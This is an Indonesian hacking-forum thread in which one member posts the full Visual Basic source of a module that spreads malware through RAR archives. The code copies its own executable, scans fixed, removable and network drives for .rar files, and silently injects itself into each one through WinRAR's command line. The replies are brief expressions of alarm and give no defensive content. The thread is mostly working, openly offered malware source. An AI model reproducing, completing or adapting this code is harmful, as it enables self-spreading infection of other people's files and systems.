.:: Blackc0de Forum ::.
Would you like to react to this message? Create an account in a few clicks or log in to continue.

-=Explore The World From Our Binary=-
 
HomeIndeksLatest imagesPendaftaranLogin

 

 [VB] Code Infeksi RAR-Winrar

Go down 
4 posters
PengirimMessage
digitalcat
BC Security
BC Security
digitalcat


Jumlah posting : 451
Points : 710
Reputation : 28
Join date : 31.10.11
Age : 42

[VB] Code Infeksi RAR-Winrar Empty
PostSubyek: [VB] Code Infeksi RAR-Winrar   [VB] Code Infeksi RAR-Winrar Icon_minitimeMon Dec 05, 2011 3:51 pm

Code:
' Module      : mRarSpread

'---------------------------------------------------------------------------------------

Option Explicit

Private Declare Function GetDriveType Lib "kernel32" Alias "GetDriveTypeA" (ByVal nDrive As String) As Long
Private Declare Function GetLogicalDriveStrings Lib "kernel32" Alias "GetLogicalDriveStringsA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
Private Declare Function CopyFile Lib "kernel32.dll" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long
Private Declare Function GetShortPathName Lib "kernel32.dll" Alias "GetShortPathNameA" (ByVal lpszLongPath As String, ByVal lpszShortPath As String, ByVal cchBuffer As Long) As Long
Private Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Private Declare Function FindFirstFile Lib "kernel32" Alias "FindFirstFileA" (ByVal lpFileName As String, lpFindFileData As WIN32_FIND_DATA) As Long
Private Declare Function FindNextFile Lib "kernel32" Alias "FindNextFileA" (ByVal hFindFile As Long, lpFindFileData As WIN32_FIND_DATA) As Long
Private Declare Function FindClose Lib "kernel32" (ByVal hFindFile As Long) As Long

Private Const MAX_PATH = 260
Private Const INVALID_HANDLE_VALUE = -1
Private Const FILE_ATTRIBUTE_ARCHIVE = &H20
Private Const FILE_ATTRIBUTE_DIRECTORY = &H10
Private Const FILE_ATTRIBUTE_HIDDEN = &H2
Private Const FILE_ATTRIBUTE_NORMAL = &H80
Private Const FILE_ATTRIBUTE_READONLY = &H1
Private Const FILE_ATTRIBUTE_SYSTEM = &H4
Private Const FILE_ATTRIBUTE_TEMPORARY = &H100

Private Type FILETIME
    dwLowDateTime As Long
    dwHighDateTime As Long
End Type

Private Type WIN32_FIND_DATA
    dwFileAttributes As Long
    ftCreationTime As FILETIME
    ftLastAccessTime As FILETIME
    ftLastWriteTime As FILETIME
    nFileSizeHigh As Long
    nFileSizeLow As Long
    dwReserved0 As Long
    dwReserved1 As Long
    cFileName As String * MAX_PATH
    cAlternate As String * 14
End Type

Public Function SearchAndInfectRars() As Boolean
    On Error Resume Next
   
    If Dir(Environ("ProgramFiles") & "\WinRAR\WinRAR.exe") <> "" Then
        Dim sBuffer As String * 255
        Dim sDrives As String
        Dim lResult As Long
        Dim sDrive As String
        Dim sPos As Integer
        Dim lType As Long
   
        Call CopyFile(App.Path & "\" & App.EXEName & ".exe", Environ("HOMEDRIVE") & App.EXEName & ".exe", False)
   
        lResult = GetLogicalDriveStrings(Len(sBuffer), sBuffer)
        sDrives = Left$(sBuffer, lResult)
 
        While Len(sDrives) > 0
            sPos = InStr(sDrives, Chr$(0))
            sDrive = Left$(sDrives, sPos - 1)
            sDrives = Mid$(sDrives, sPos + 1)
       
            lType = GetDriveType(sDrive)
           
                If lType = 2 Or lType = 3 Or lType = 4 Then
                    Call FindFiles(Left$(sDrive, 2), "*.rar")
                End If
        Wend
    End If
End Function

Private Function RARSpread(ByVal WinrarPath As String, ByVal RarArchive As String, ByVal Malware As String) As Boolean
    On Error GoTo err:
    If (Dir(WinrarPath) <> "") And (Dir(RarArchive) <> "") And (Dir(Malware) <> "") Then
        Dim lRet As Long
        lRet = ShellExecute(GetModuleHandle(App.Path), "open", WinrarPath, " a -y " & RarArchive & " " & Malware, "C:\", 0)
            If lRet = 42 Then
                RARSpread = True
            Else
                RARSpread = False
            End If
    Else
        RARSpread = False
    End If
    Exit Function
err:
    RARSpread = False
End Function

Private Sub FindFiles(ByVal vsFolderPath As String, ByVal vsSearch As String)
    Dim WFD As WIN32_FIND_DATA
    Dim hSearch As Long
    Dim strDirName As String

    DoEvents

        If Right$(vsFolderPath, 1) <> "\" Then
            vsFolderPath = vsFolderPath & "\"
        End If

    hSearch = FindFirstFile(vsFolderPath & "*.*", WFD)

        If hSearch <> INVALID_HANDLE_VALUE Then GetFilesInFolder vsFolderPath, vsSearch

            Do
                If (WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) Then strDirName = TrimNulls(WFD.cFileName)
                If (strDirName <> ".") And (strDirName <> "..") Then
                    FindFiles vsFolderPath & strDirName, vsSearch
                End If
   
        Loop While FindNextFile(hSearch, WFD)
            FindClose hSearch
            Kill "C:\" & App.EXEName & ".exe"
End Sub

Private Sub GetFilesInFolder(ByVal vsFolderPath As String, ByVal vsSearch As String)
    On Error Resume Next
    Dim WFD As WIN32_FIND_DATA
    Dim hSearch As Long
    Dim strFileName As String
    Dim lVal As Long
    Dim short_path As String
   
    If Right$(vsFolderPath, 1) <> "\" Then
        vsFolderPath = vsFolderPath & "\"
    End If

    hSearch = FindFirstFile(vsFolderPath & vsSearch, WFD)
 
        If hSearch <> INVALID_HANDLE_VALUE Then
            Do
                If (WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) <> FILE_ATTRIBUTE_DIRECTORY Then
                    strFileName = TrimNulls(WFD.cFileName)
                    short_path = Space$(256)
                    lVal = GetShortPathName(vsFolderPath & strFileName, short_path, Len(short_path))
                    Call RARSpread(Environ("ProgramFiles") & "\WinRAR\WinRAR.exe", Left$(short_path, lVal), Environ("HOMEDRIVE") & App.EXEName & ".exe")
                End If
               
    Loop While FindNextFile(hSearch, WFD)
        FindClose hSearch
    End If
End Sub

Private Function TrimNulls(ByVal vsStringIn As String) As String
        If InStr(vsStringIn, Chr(0)) > 0 Then
            vsStringIn = Left$(vsStringIn, InStr(vsStringIn, Chr(0)) - 1)
        End If
    TrimNulls = vsStringIn
End Function
Kembali Ke Atas Go down
CyberWild
Moderator
Moderator
CyberWild


Jumlah posting : 1665
Points : 2310
Reputation : 104
Join date : 11.06.11
Age : 43
Lokasi : internet cloud

[VB] Code Infeksi RAR-Winrar Empty
PostSubyek: Re: [VB] Code Infeksi RAR-Winrar   [VB] Code Infeksi RAR-Winrar Icon_minitimeMon Dec 05, 2011 3:53 pm

apaan itu oms?
Kembali Ke Atas Go down
http://cyberwild.p.ht/
digitalcat
BC Security
BC Security
digitalcat


Jumlah posting : 451
Points : 710
Reputation : 28
Join date : 31.10.11
Age : 42

[VB] Code Infeksi RAR-Winrar Empty
PostSubyek: Re: [VB] Code Infeksi RAR-Winrar   [VB] Code Infeksi RAR-Winrar Icon_minitimeMon Dec 05, 2011 9:30 pm

Visual Basic modul code untuk infeksi winrar
Kembali Ke Atas Go down
dark_kiddy
VIP Member
VIP Member
dark_kiddy


Jumlah posting : 176
Points : 229
Reputation : 6
Join date : 24.10.11
Age : 34
Lokasi : Makassar

[VB] Code Infeksi RAR-Winrar Empty
PostSubyek: Re: [VB] Code Infeksi RAR-Winrar   [VB] Code Infeksi RAR-Winrar Icon_minitimeMon Dec 05, 2011 11:36 pm

wah...~!!! gawat jg nich om klo sampe isi2 kampi ene kena...!!! hampir semua pake winrar nichh...!!! :mngiler: siaga 1 berjalan :spy:

klo bisa share jg nich cara atasinX :fxx:
Kembali Ke Atas Go down
robofics
VIP Member
VIP Member
robofics


Jumlah posting : 709
Points : 804
Reputation : 20
Join date : 22.12.11
Lokasi : /dev/null

[VB] Code Infeksi RAR-Winrar Empty
PostSubyek: Re: [VB] Code Infeksi RAR-Winrar   [VB] Code Infeksi RAR-Winrar Icon_minitimeTue Jan 24, 2012 1:35 pm

weeew ? bahaya ini..
siapsiap backup file ini om
:takut
Kembali Ke Atas Go down
http://robofics.wordpress.com
Sponsored content





[VB] Code Infeksi RAR-Winrar Empty
PostSubyek: Re: [VB] Code Infeksi RAR-Winrar   [VB] Code Infeksi RAR-Winrar Icon_minitime

Kembali Ke Atas Go down
 
[VB] Code Infeksi RAR-Winrar
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» Virus ? code in C
» Mudah-nya “Zeus” meng-infeksi OS Android (dan yang lain-nya)
» virus vb code
» C++ Worm - Source Code
» content top Cara menghapus virus Autorun.inf menggunakan Winrar.

Permissions in this forum:Anda tidak dapat menjawab topik
.:: Blackc0de Forum ::. :: Information Technology :: Virus,Malware,Trojan,Worm, Dll-
Navigasi: